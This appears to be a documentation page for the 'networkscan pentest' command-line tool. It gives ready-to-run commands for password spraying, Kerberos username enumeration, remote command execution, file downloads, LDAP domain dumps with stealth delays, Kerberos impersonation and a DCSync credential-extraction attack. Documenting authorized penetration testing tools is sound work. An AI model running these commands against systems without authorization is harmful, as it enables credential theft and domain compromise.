Skip to content

Pentest#

The networkscan pentest command provides comprehensive penetration testing capabilities against network services, including credential spraying and service-specific attacks.

Usage#

networkscan pentest [command]

Commands#

Spray Commands#

The spray commands perform credential spraying attacks and username enumeration against network services.

Password Spray#

Perform password spraying attacks against specified targets and services.

Usage#
networkscan pentest spray password --targets 192.168.1.100:445 --service SMB --usernames admin,user --passwords Password123,123456
Supported Services#
  • SSH - Secure Shell protocol
  • SMB - Server Message Block protocol
  • TELNET - Telnet protocol
  • FTP - File Transfer Protocol
  • LDAP - Lightweight Directory Access Protocol
  • KERBEROS - Kerberos authentication protocol
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (required)
  • --usernames / -u - Usernames to spray
  • --passwords / -p - Passwords to spray
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --password-lists - Built-in password lists (SYSTEM_PASSWORDS, DOMAIN_PASSWORDS, SERVICE_PASSWORDS)
  • --domain / -d - Domain for SMB/LDAP/KERBEROS authentication
  • --ntlm-hashes - NTLM hashes for pass-the-hash authentication (32 hex chars each)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between password attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --stop-on-first-success - Stop after first successful authentication
  • --successful-only - Only show successful authentications in output

Username Spray#

Perform username enumeration against specified targets and services.

Usage#
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --usernames admin,guest
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (currently only KERBEROS supported) (required)
  • --domain / -d - Domain for Kerberos authentication (required)
  • --usernames / -u - Usernames to enumerate
  • --username-file - File containing usernames (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --username-scheme - Generate usernames using scheme (FLAST, FIRST_DOT_LAST, FIRSTLAST, LASTFIRST, FIRST, LAST, F_LAST, FIRST_LAST)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between username attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --successful-only - Only show successful username enumerations in output

Service Commands#

The service commands perform service-specific penetration testing operations against network services.

SMB#

Perform pentest operations against SMB services including authentication testing, command execution, share enumeration, and file downloads.

Usage#
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin,user --passwords password,123456 --actions AUTHENTICATE,SHARE_ENUM
Available Actions#

Use the --actions flag to specify what operations to perform. Base enumeration is always performed.

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform (see available actions)
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --remote-file-path - Remote file path to download (format: SHARE\path\to\file)
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results

SSH#

Perform pentest operations against SSH services including authentication testing, command execution, and file transfers.

Usage#
networkscan pentest service ssh --targets 192.168.1.100:22 --usernames root,admin --passwords password,123456 --actions AUTHENTICATE,EXECUTE
Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --key-file - SSH private key file
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --upload - Files to upload (local:remote format)
  • --download - Remote files to download
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results

Telnet#

Perform pentest operations against Telnet services including authentication testing and command execution.

Usage#
networkscan pentest service telnet --targets 192.168.1.100:23 --usernames admin --passwords password --actions AUTHENTICATE,EXECUTE
Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results

LDAP#

Perform pentest operations against LDAP services including authentication testing and domain enumeration.

Usage#
networkscan pentest service ldap --targets 192.168.1.10:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions AUTHENTICATE,DOMAINDUMP
Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
  • --sleep - Delay in seconds between LDAP queries for stealth mode
  • --jitter - Jitter percentage (0-100) to randomize sleep delays
  • --max-queries - Maximum total LDAP queries to perform (0 = unlimited)
  • --minimal-queries - Use minimal query sets and essential attributes only

MSRPC#

Perform pentest operations against MS-RPC services including DCSync attacks via DRSUAPI.

Usage#
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC
Key Flags#
  • --targets - Target hosts (required)
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --kerberos-ticket - Base64-encoded Kerberos ticket (TGS) for ticket-based authentication
  • --domain - Domain name (required for DCSync)
  • --actions - Actions to perform: DCSYNC (required)
  • --timeout - Connection timeout in seconds (default: 10)

Kerberos#

Perform pentest operations against Kerberos services including advanced attacks such as constrained delegation.

Usage#
networkscan pentest service kerberos --targets dc.example.com:88 --usernames user --passwords pass --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/server.example.com
Key Flags#
  • --targets - Target domain controllers (DC.domain.com:88) (required)
  • --actions - Actions to perform: SERVICE_TICKET
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for user
  • --ntlm-hash - NTLM hash for user authentication
  • --domain / -d - Domain name
  • --spn - Target Service Principal Name (e.g., HTTP/server.domain.com)
  • --impersonate - Target user to impersonate (optional, for delegation attacks)
  • --timeout - Connection timeout in milliseconds (default: 5000)

Examples#

Basic Authentication Testing#

# Test SMB authentication with domain
networkscan pentest service smb --targets server.domain.com:445 --usernames admin --passwords Password123 --domain CORP --actions AUTHENTICATE

# Test SSH with key-based auth
networkscan pentest service ssh --targets 192.168.1.10:22 --usernames root --key-file ~/.ssh/id_rsa --actions AUTHENTICATE,EXECUTE --execute "whoami"

# Test Telnet with wordlists
networkscan pentest service telnet --targets 192.168.1.20:23 --username-file users.txt --password-file passwords.txt --actions AUTHENTICATE

Password Spraying#

# SMB password spray
networkscan pentest spray password --targets 192.168.1.0/24 --service SMB --usernames admin,guest --passwords Password123,123456 --domain CORP

# Kerberos username enumeration
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --username-lists DOMAIN_USERNAMES

# LDAP password spray with stealth
networkscan pentest spray password --targets ldap.example.com:389 --service LDAP --usernames user1,user2 --passwords pass1,pass2 --domain EXAMPLE --sleep 2 --jitter 10

Advanced Usage#

# SMB with file download
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin --passwords password --remote-file-path "C$\\Windows\\System32\\drivers\\etc\\hosts"

# LDAP domain dump with stealth
networkscan pentest service ldap --targets dc.example.com:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions DOMAINDUMP --sleep 1 --minimal-queries

# Kerberos service ticket with impersonation
networkscan pentest service kerberos --targets dc.example.com:88 --usernames service_account --passwords ServicePass123 --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/webapp.example.com --impersonate administrator

# DCSync attack
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC